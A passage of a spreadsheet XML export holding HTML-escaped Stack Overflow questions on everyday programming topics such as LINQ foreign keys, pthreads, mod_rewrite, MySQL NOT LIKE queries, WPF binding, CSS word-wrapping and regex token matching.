&lt;p&gt;However, when I remove the line that nulls the User property, I get this error on my SubmitChanges line:
&lt;PRE&gt;Value cannot be null.
Parameter name: cons&lt;/PRE&gt;&lt;/p&gt;
&lt;p&gt;None of my tables have a field called 'cons', nor is it in my 5,500-line DataContext.designer.cs file, nor is it in the QuickWatch for any of the related objects, so I have no idea what 'cons' is.&lt;/p&gt;
&lt;p&gt;In the Database, Session.UID is a nullable int field and User.ID is a non-nullable int. I want to record sessions that may or may not have a UID, and I'd rather do it without disabling constraint on that FK relationship. Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Important to you in your choice of developer tools?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company sells developer tools. As a developer myself, it is hard not to assume that what is important to me is important to many other developers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;In our case, the thing we lack the most is time. So, I'm willing to spend money on things like Microsoft Team Foundation Server which integrates well with Visual Studio and handles various aspects of managing a software project in an integrated fashion. And InstallShield Professional, which seems overpriced until I think about how much time it saves me. We arguably spend too much on the latest and greatest computers and monitors. I even built computers for two of us from gaming parts - at one year old they are still faster than a top of the line Dell Precision which we purchased recently (I was too busy to build one at the time).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I care a lot about performance and efficiency, so I am happy to spend money on tools which help us to build a faster and smaller product.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I am satisfied with the tools we use with one exception - support. It is amazing to how bad the support can be from some very successful companies.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I prefer a terse, to the point technical book (K&amp;amp;R C is a great example of what I mean by this) or article to a wordy one.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So, all of this probably comes across in our product and company:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;We are not embarrassed to charge for our software. We are not the most expensive option, but we are certainly not the least expensive.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We spend a lot of time on the performance of a feature before we release it. We spent 27 months on V1 of our product - and it did little more than read, write and calculate.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;To make sure that our customers (who are developers) get good support, our developers (including me) take turns providing phone and email support.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We don't spend time on wordy doc. We have short Welcome / Getting Started / Tutorial sections in our help, but we spend most of our documentation efforts writing terse API reference material and creating samples which address the questions asked most frequently by our customers.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For each of these subjects, we could arguably do something smarter:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;We could have a less expensive limited version (fewer features and / or less support) or even a free "Express" version with appropriate limitations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We could do more features and spend less time honing each of them.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We could hire a less experienced and less expensive person to do first line support.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We could spend more time writing wordy documentation or hire a full time documentation person next instead of another developer.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;What is important to you?&lt;/h2&gt;
</t>
  </si>
  <si>
    <t>Is PThread a good choice for multi-platorm C/C++ multi-threading program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Been doing mostly Java and smattering of .NET for last five years and haven't written any significant C or C++ during that time. So have been away from that scene for a while.&lt;/p&gt;
&lt;p&gt;If I want to write a C or C++ program today that does some multi-threading and is source code portable across Windows, Mac OS X, and Linux/Unix - is PThread a good choice?&lt;/p&gt;
&lt;p&gt;The C or C++ code won't be doing any GUI, so won't need to worry with any of that.&lt;/p&gt;
&lt;p&gt;For the Windows platform, I don't want to bring a lot of Unix baggage, though, in terms of unix emulation runtime libraries. Would prefer a PThread API for Windows that is a thin-as-possible wrapper over existing Windows threading APIs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ADDENDUM EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Am leaning toward going with
  boost:thread - I also want to be able
  to use C++ try/catch exception
  handling too. And even though my
  program will be rather minimal and not
  particularly OOPish, I like to
  encapsulate using class and namespace
  - as opposed to C disembodied functions.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Exist any Obj-c library to integration with paypal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder if exist a pre-made objective-c library to work with paypal, including with credit-cards.&lt;/p&gt;
&lt;p&gt;My google search not get returns (I look for objective-c paypal)&lt;/p&gt;
&lt;p&gt;Also, if exist other librarys for common gateways....&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your personal approach/take on commenting?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;Duplicate&lt;/h3&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/142830/what-are-your-hard-rules-about-commenting-your-code"&gt;What are your hard rules about commenting?&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A Developer I work with had some things to say about commenting that were interesting to me (see below). What is your personal approach/take on commenting?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"I don't add    comments to code unless
  its a simple heading or there's a&lt;br /&gt;
  platform-bug or a necessary
  work-around that isn't obvious. Code
  can    change and comments may become
  misleading. Code should be&lt;br /&gt;
  self-documenting in its use of
  descriptive names and its logical&lt;br /&gt;
  organization - and its solutions
  should be the cleanest/simplest way&lt;br /&gt;
  to perform a given task. If a
  programmer can't tell what a program&lt;br /&gt;
  does by only reading the code, then
  he's not ready to alter it.&lt;br /&gt;
  Commenting tends to be a crutch for
  writing something complex or&lt;br /&gt;
  non-obvious - my goal is to always
  write clean and simple code."&lt;/p&gt;
  &lt;p&gt;"I think there a few camps when it
  comes to commenting, the
  enterprisey-type who think they're
  writing an API and some grand
  code-library that will be used for
  generations to come, the
  craftsman-like programmer that thinks
  code says what it does clearer than a
  comment could, and novices that write
  verbose/unclear code so as to need to
  leave notes to themselves as to why
  they did something."&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Why would mod_rewrite rewrite twice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/180007/how-do-configure-optional-or-extraneous-urls"&gt;I only recently found out about URL rewriting&lt;/a&gt;, so I've still got a lot to learn.&lt;/p&gt;
&lt;p&gt;While following the &lt;a href="http://www.easymodrewrite.com/" rel="nofollow"&gt;Easy Mod Rewrite&lt;/a&gt; tutorial, the results of one of their examples is really confusing me.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteBase /
RewriteRule (.*) index.php?page=$1 [QSA,L]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Rewrites &lt;strong&gt;&lt;code&gt;/home&lt;/code&gt;&lt;/strong&gt; as &lt;strong&gt;&lt;code&gt;/index.php?page=index.php&amp;amp;page=home&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I thought the duplicates might have had been caused by something in my host's configs, but a clean install of &lt;a href="http://www.apachefriends.org/en/xampp-windows.html#646" rel="nofollow"&gt;XAMPP&lt;/a&gt; does the same.&lt;/p&gt;
&lt;p&gt;So, does anyone know why this seems to parse twice?&lt;/p&gt;
&lt;p&gt;And, to me this seems like, if it's going to do this, it would be an infinite loop -- why does it stop at 2 cycles?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the significance of starting constants with 'k'?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm teaching myself Objective-C and I noticed in a lot of books and examples the use of 'k' and camel-casing in constant definition, e.g. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define kMyConstant 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the significance of the 'k'? 
Is this unique to Objective-C style, or common to C in general?
Why the deviation from (what I've always thought as a best practice) K_MY_CONSTANT style?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's your disaster recovery plan?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;And what would you recommend for an ASP Net web application, with a not so large SQL server database (around 10Gb)?&lt;/p&gt;
&lt;p&gt;I was just wondering, is that a good idea to have an Amazon EC2 instance configured ready to host your app in an emergency?&lt;/p&gt;
&lt;p&gt;In this scenario, what would be the best approach to keep the database updated (log shipping? manual backup restore?) and the easiest and fastest way to change the dns settings?&lt;/p&gt;
&lt;p&gt;Edit: the acceptable downtime would be something between 4 to 6 hours, thats why i considered using the Amazon ec2 option for its lower cost if compared to renting a secondary server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Two Tables Same Height</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want two tables to have the same height. If the left table contain longer text than the right table I want it to be as long as the left table.&lt;/p&gt;
&lt;p&gt;This is how it looks now:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/aCoOR.png" alt="enter image description here"&gt;&lt;/p&gt;
&lt;p&gt;I can't set the height because that would limit how much text you can write...&lt;/p&gt;
&lt;p&gt;This is how I want it:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/Ah1iS.png" alt="enter image description here"&gt;&lt;/p&gt;
&lt;p&gt;Code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table cellspacing="0" width="30%" align="left" class="rowA"&amp;gt;
&amp;lt;tr&amp;gt;
    &amp;lt;td&amp;gt;
    Sed ut perspiciatis unde omnis iste natus error sit voluptatem 
    accusantium doloremque laudantium, totam rem aperiam, eaque ipsa 
    quae ab illo inventore veritatis et quasi architecto beatae vitae dicta 
    sunt explicabo. "Sed ut perspiciatis unde omnis iste natus error sit 
    voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque 
    ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae 
    dicta sunt explicabo. 
    &amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table cellspacing="0" width="70%" align="right" class="rowB"&amp;gt;
&amp;lt;tr&amp;gt;
    &amp;lt;td&amp;gt;
    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do 
    eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut 
    enim ad minim veniam, quis nostrud exercitation ullamco laboris 
    nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor 
    in reprehenderit in voluptate velit esse cillum dolore eu fugiat
    nulla pariatur. Excepteur sint occaecat cupidatat non proident, 
    sunt in culpa qui officia deserunt mollit anim id est laborum.
    &amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you encourage end users to fill out trouble tickets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I work in a fairly small IT section.  We have a trouble ticketing system that about half of our end users use.  Some of my coworkers don't really do much to encourage our end users to use the system we have in place.  The end result?  Constant interruptions because end users will get us by IM or come to our offices directly for trivial things.  This can obviously make it difficult to do a good job of writing code.&lt;/p&gt;
&lt;p&gt;Now, I suppose I could just say "hey, would you mind filling out a trouble ticket next time?", but then I'd come off as the bad guy because others won't do that.  I also don't want end users to feel that I'm unapproachable.  I just want them to understand that there's a proper way to ask for help.&lt;/p&gt;
&lt;p&gt;So what's the best thing for me to do in a situation like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does backtracking make an algorithm non-deterministic?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I've had at least two professors mention that backtracking makes an algorithm non-deterministic without giving too much explanation into why that is.  I &lt;em&gt;think&lt;/em&gt; I understand how this happens, but I have trouble putting it into words.  Could somebody give me a concise explanation of the reason for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Timezone considerations in sql server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using an sql server 2005 hosted in the states. Soon we will move the db to Europe.
I'd like to update the dates in the db to take into account the timezone difference.
Is there a good way to do this?
Or is it just a case of looping through the dates and adding the timezone offset?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Properties for object instances?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After the previous question "What are the important rules in Object Model Design", now I want to ask this: &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is there any way to have dynamic properties for class instances?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Suppose that we have this schematic object model:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/EAwrg.gif" alt="object model"&gt;&lt;/p&gt;
&lt;p&gt;So, each object could have lots of properties due to the set of implemented Interfaces, and then become relatively heavy object. Creating all the possible -and of course reasonable- object can be a way for solving this problem *(i.e. Pipe_Designed v.s. Pipe_Designed_NeedInspection)*, but I have a large number of interfaces by now, that make it difficult.
I wonder if there is a way to have dynamic properties, something like the following dialog to allow the end user to select available functionalities for his/hers new object.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/9L9nz.gif" alt="dialog"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In C++/CLI, what does the hat character ^ do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading Ivor Horton's Beginning Visual C++ 2008 and many of its CLR examples have this definition for main:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int main(array&amp;lt;System::String ^&amp;gt; ^args)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I went back, page by page, to the beginning of the book to find the first such instance with an explanation what it really means, but couldn't find one.&lt;/p&gt;
&lt;p&gt;Obviously it means the same as the standard &lt;code&gt;int main(int argc, char *argv[])&lt;/code&gt;, but I'd like to know when and why that &lt;code&gt;^&lt;/code&gt; is really used, and why it even exists (does it do something that pointers &lt;code&gt;*&lt;/code&gt; and references &lt;code&gt;&amp;amp;&lt;/code&gt; cannot represent)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do Django model fields work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First of all,I'm not into web programming. I bumped into django and read a bit about models. I was intrigued by the following code ( from djangoproject.com ) :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
class Person(models.Model):
    first_name = models.CharField(max_length=50)
    last_name = models.CharField(max_length=50)
    def __str__(self):
        # Note use of django.utils.encoding.smart_str() here because
        # first_name and last_name will be unicode strings.
        return smart_str('%s %s' % (self.first_name, self.last_name))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By my understanding of python , first_name and last_name are class variables , right ? How is that used in code ( because I guess that setting Person.first_name or Person.last_name will affect all Person instances ) ? Why is it used that way ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mvc Release Candidate "File" ActionResult</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;K... I'm doing something obviously wrong. I have a simple page with a file input control on and a submit button. I'm trying out the new "File" ActionResult that was released with the Mvc RC...&lt;/p&gt;
&lt;p&gt;All, I want to happen is when the submit button is clicked the selected file is uploaded to the database. This all works fine...&lt;/p&gt;
&lt;p&gt;Then, after the page refreshes I want a image to display the resulting image that was uploaded. The issue, is that the image is not rendering... I get the broken image...&lt;/p&gt;
&lt;p&gt;This is the portion that is getting the file and sending it back to the view...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        var a = Helper.Service.GetAttachmentById(id, MembershipProvider.SecurityTicket);
        if (a == null)
        {
            return View(new ImagePlaceHolderViewData(new { Id = id }));
        }
        return View(new ImagePlaceHolderViewData(new { Id = a.Id, Image = a, FileContent = File(a.Data, a.ContentType) }));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then in the view I have a image tag like so...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="&amp;lt;%=Model.FileContent.FileContents %&amp;gt;" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have also tried...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="&amp;lt;%=Model.FileContent%&amp;gt;" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thoughts..??&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL NOT LIKE query not working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2 tables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;posts&lt;/li&gt;
&lt;li&gt;tags&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Tags table is structured like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;post_id&lt;/li&gt;
&lt;li&gt;tag&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So for every tag that's given for a post, I create a record in the tags table. If a post has 10 tags, there will be 10 records in tags table with that post_id.&lt;/p&gt;
&lt;p&gt;I'm now trying to build a search page where users can do a search for posts where tags do not contain the given keywords. This creates a problem though. A query like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DISTINCT posts.id, posts.title, posts.content
   FROM jobs, tags
   WHERE tags.tag NOT LIKE '%$keywords%' AND posts.id=tags.post_id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;doesn't work because if a post has got 6 tags and one of them has got the keyword, it will still be returned because the other 5 records in the tags table don't have that keyword.&lt;/p&gt;
&lt;p&gt;What's the best way to solve this? Any way other than creating a new column in the posts table which stores all the comma-separated tags used only for search??&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to efficiently implement an event loop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;COM Object&lt;/strong&gt; (Server) sends &lt;strong&gt;event notification&lt;/strong&gt; successfully to &lt;strong&gt;COM Client&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Without:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ATL&lt;/li&gt;
&lt;li&gt;MFC&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How to efficiently get the &lt;strong&gt;main thread&lt;/strong&gt; to &lt;strong&gt;wait/sleep&lt;/strong&gt; (infinitely) until &lt;strong&gt;COM Server&lt;/strong&gt; notifies the &lt;strong&gt;COM Client&lt;/strong&gt; of a particular &lt;strong&gt;event&lt;/strong&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert a decimal to an int in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I convert a decimal to an int?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows equivalent of the Mac OS X â€œopenâ€ command</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Liu Chang asked a very similar question to this one here, &lt;a href="http://stackoverflow.com/questions/264395/linux-equivalent-of-the-mac-os-x-open-command"&gt;http://stackoverflow.com/questions/264395/linux-equivalent-of-the-mac-os-x-open-command&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Is there a windows equivalent for the Mac OS X "open" command.  I'm trying to run a profiler that will open it's results, but it's looking for the "open" command.  Basically, the command needs to open a file from the command prompt as if it were double-clicked on in explorer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>format date in c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I format a date as &lt;code&gt;dd/mm/yyyy&lt;/code&gt; or &lt;code&gt;mm/dd/yy&lt;/code&gt; ? &lt;/p&gt;
&lt;p&gt;Like in VB &lt;code&gt;format("dd/mm/yy",now)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;How can I do this in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to rename XIB/NIB files in Xcode 3?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I rename XIB/NIB files in Xcode? There is no "Refactor" option, and right clicking and choosing "Rename" does not work correctly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extending borders</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an image that will be centered (left and right) in the window, there is no left border,but there is a right border. I was wondering if it is possible for the top border to go from the very left of the page (past the image) and stop at the right border and for the bottom border to start at the left end of the image and stretch across all the way to the right of the window.  The top and bottom borders are made of two different repeating backgrounds and the left border can be too, if needed.&lt;/p&gt;
&lt;p&gt;I've been thinking about this for a while but couldn't come up with any solutions...can someone help me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Post/Redirect/Get: Redirect to specific route</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following scenario:&lt;/p&gt;
&lt;p&gt;I have an edit page, which can be called from different pages. These pages could be the detail view for the current entity, or the list view for the entities (with or without a search in the route).&lt;/p&gt;
&lt;p&gt;HOW do I cleanly redirect to the original calling page using the MVC framework? Of course I could simply pass the HttpContext.Request.Url value by holding it in my TempData, but that sort of smells, in my eyes (or, err, nose). It's on a lower level than the rest of the code.&lt;/p&gt;
&lt;p&gt;Is there a way to get the routevalues for the previous page in a controller context? If I have that, I could store that temporarily and pass that to the redirect.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple simulations for Physics in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know similar, concrete simulations, as the simulation about watering a field &lt;a href="http://stackoverflow.com/questions/494184/simulation-problem-with-mouse-in-pygame"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What is your favorite library/internet page for such simulations in Python?&lt;/p&gt;
&lt;p&gt;I know little Simpy, Numpy and Pygame. I would like to get examples about them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WebForm_PostBackOptions documentation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any documentation on the parameters to WebForm_PostBackOptions? I can't find anything by Googling.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bind to a method in WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you bind to an objects method in this scenario in WPF?&lt;/p&gt;
&lt;pre class="lang-cs prettyprint-override"&gt;&lt;code&gt;public class RootObject
{
    public string Name { get; }
    public ObservableCollection&amp;lt;ChildObject&amp;gt; GetChildren() {...}
}
public class ChildObject
{
    public string Name { get; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;XAML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;TreeView ItemsSource="some list of RootObjects"&amp;gt;
    &amp;lt;TreeView.Resources&amp;gt;
        &amp;lt;HierarchicalDataTemplate DataType="{x:Type data:RootObject}" 
                                  ItemsSource="???"&amp;gt;
            &amp;lt;TextBlock Text="{Binding Path=Name}" /&amp;gt;
        &amp;lt;/HierarchicalDataTemplate&amp;gt;
        &amp;lt;HierarchicalDataTemplate DataType="{x:Type data:ChildObject}"&amp;gt;
            &amp;lt;TextBlock Text="{Binding Path=Name}" /&amp;gt;
        &amp;lt;/HierarchicalDataTemplate&amp;gt;
    &amp;lt;/TreeView.Resources&amp;gt;
&amp;lt;/TreeView&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here I want to bind to the &lt;code&gt;GetChildren&lt;/code&gt; method on each &lt;code&gt;RootObject&lt;/code&gt; of the tree.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt; Binding to an &lt;code&gt;ObjectDataProvider&lt;/code&gt; doesn't seem to work because I'm binding to a list of items, and the &lt;code&gt;ObjectDataProvider&lt;/code&gt; needs either a static method, or it creates it's own instance and uses that.&lt;/p&gt;
&lt;p&gt;For example, using Matt's answer I get:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.Windows.Data Error: 33 : ObjectDataProvider cannot create object; Type='RootObject'; Error='Wrong parameters for constructor.'&lt;/p&gt;
  &lt;p&gt;System.Windows.Data Error: 34 : ObjectDataProvider: Failure trying to invoke method on type; Method='GetChildren'; Type='RootObject'; Error='The specified member cannot be invoked on target.' TargetException:'System.Reflection.TargetException: Non-static method requires a target.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How do I implement a generic stack in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Visual C# to program an RPN calculator using Stack. Problem is I don't know how to do this. I'm using System.Collections.Generic, but&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Stack&amp;lt;double&amp;gt; s = new Stack&amp;lt;double&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;generates the error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Using the generic type 'System.Collections.Generic.Stack' requires '1' type arguments&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm pretty clueless here. Thanks for the help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Equivalent code in jQuery when integrating another library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using &lt;a href="http://en.wikipedia.org/wiki/MooTools" rel="nofollow"&gt;MooTools&lt;/a&gt; 1.11 and &lt;a href="http://en.wikipedia.org/wiki/JQuery" rel="nofollow"&gt;jQuery&lt;/a&gt; 1.2. The Ajax function is not working properly for the following code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;jQuery(document).ready(function($) {
    confirm("Hello");
    function confirm(message){
        $.ajax({
            url: 'ajax.php',
            ....
        });
     }
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What modification should I do to execute the Ajax function correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing "const" variable to method in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an equivalent in Java to the passing on const references in C++?&lt;br&gt;
Isn't leaving out the "constness" misleading in regard to the method signature?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>sharing asp session over virtual directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In IIS I have asp (classic) site. In that site there is virtual directory. Is there any way to share session between those two web applications?&lt;/p&gt;
&lt;p&gt;tnx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS word-wrapping in div</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a div with a width of 250px. When the innertext is wider than that i want it to break down. The div is float: left and now has an overflow. I want the scrollbar to go away by using word-wrapping. How can i achieve this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="Treeview"&amp;gt;
&amp;lt;div id="HandboekBox"&amp;gt;
    &amp;lt;div id="HandboekTitel"&amp;gt;
        &amp;lt;asp:Label ID="lblManual" runat="server"&amp;gt;&amp;lt;/asp:Label&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div id="HandboekClose"&amp;gt;
        &amp;lt;asp:ImageButton ID="btnCloseManual" runat="server" 
            ImageUrl="Graphics/close.png" onclick="btnCloseManual_Click" 
            BorderWidth="0" ToolTip="Sluit handboek" /&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;asp:TreeView ID="tvManual" runat="server" RootNodeStyle-CssClass="RootNode"&amp;gt;
    &amp;lt;Nodes&amp;gt;
    &amp;lt;/Nodes&amp;gt;
&amp;lt;/asp:TreeView&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;CSS:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#Treeview
{
padding-right: 5px;
width: 250px;
height: 100%;
float: left;
border-right: solid 1px black;
overflow-x: scroll;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Regex: How to get all contents inside a tag #[SOME TEXT HERE]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a simple token replacement feature of our product. I have almost resolved all the issue but I missed one thing. A token must support attributes, and an attribute can also be a token. This is part of a bigger project. hope you can help.&lt;/p&gt;
&lt;p&gt;The begining tag is &lt;code&gt;"**#[**"&lt;/code&gt; and the ending tag is &lt;code&gt;"**]**"&lt;/code&gt;. Say, #[FirstName], #[LastName], #[Age, WhenZero="Undisclosed"].&lt;/p&gt;
&lt;p&gt;Right now i am using this expression &lt;code&gt;"\#\[[^\]]+\]"&lt;/code&gt;. I have this working but it failed on this input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;blah blah text here...
**#[IsFreeShipping, WhenTrue="&amp;lt;img src='/images/fw_freeshipping.gif'/&amp;gt;
&amp;lt;a href='http://www.hellowebsite.net/freeshipping.aspx'&amp;gt;$[FreeShipping]&amp;lt;/a&amp;gt;"]**
blah blah text here also...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It fails becauise it encouter the first ], it stops there. It returns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*#[IsFreeShipping, WhenTrue="&amp;lt;img src='/images/fw_freeshipping.gif'/&amp;gt;
&amp;lt;a href='http://www.hellowebsite.net/freeshipping.aspx'&amp;gt;$[Product_FreeShipping]*
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My desired result should be&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*#[IsFreeShipping, WhenTrue="&amp;lt;img src='/images/fw_freeshipping.gif'/&amp;gt;
&amp;lt;a href='http://www.hellowebsite.net/freeshipping.aspx'&amp;gt;$[FreeShipping]&amp;lt;/a&amp;gt;"]*
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Versioning CSS files with a query string like Stackoverflow does?</t>
  </si>
  <si>
